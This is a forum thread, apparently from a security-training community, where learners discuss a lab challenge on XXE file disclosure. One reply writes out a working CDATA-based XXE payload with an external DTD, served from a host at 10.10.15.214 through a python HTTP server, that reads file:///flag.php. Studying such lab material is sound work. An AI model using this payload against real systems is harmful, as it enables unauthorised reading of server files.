Please could someone give me a tip to help complete the challenge at the end of the Advanced File Disclosure Section
I’ve tried both methods to try and find flag.php. When I use either method I can get the other PHP pages to show up fine, I can view system files, but for some reason I can’t find the flag. This makes me believe it might be contained in a subdirectory that I don’t know the name of. I’ve already tried fuzzing for different directories but this still isn’t helping.
hi @Theonly_wilko
…am not even able to view the system files in the response…
in my local DTD file, i kept it as echo ‘’ > xxe.dtd
also ,in my request I append the piece of code given in the module by changing the IP AND PORT alone…
Can you tell me whether I should append anything in the local DTD file as the hint says-Don’t forget to point the ‘file’ to the flag in your local DTD file.
So, for all struggling here. Here is what you might want to do
Basic
Make sure you include the reference entity in the <email> * </email> tags. For instance: <email>company;</email>
You don’t forget about ; after the reference entity
Advanced – CDATA
Set a payload on your machine:
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
python3 -m http.server 8000
Exploit: Add this on top of the POST request in Burp Suite:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///flag.php">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://10.10.15.214:8000/xxe.dtd">
%xxe;
]>
...........
<email>&joined;</email>
...........
As you can tell, no secrets told. Everything is being given in the module and is directly taken from it. Tho, the error based XXE doesn’t seem to work for me at all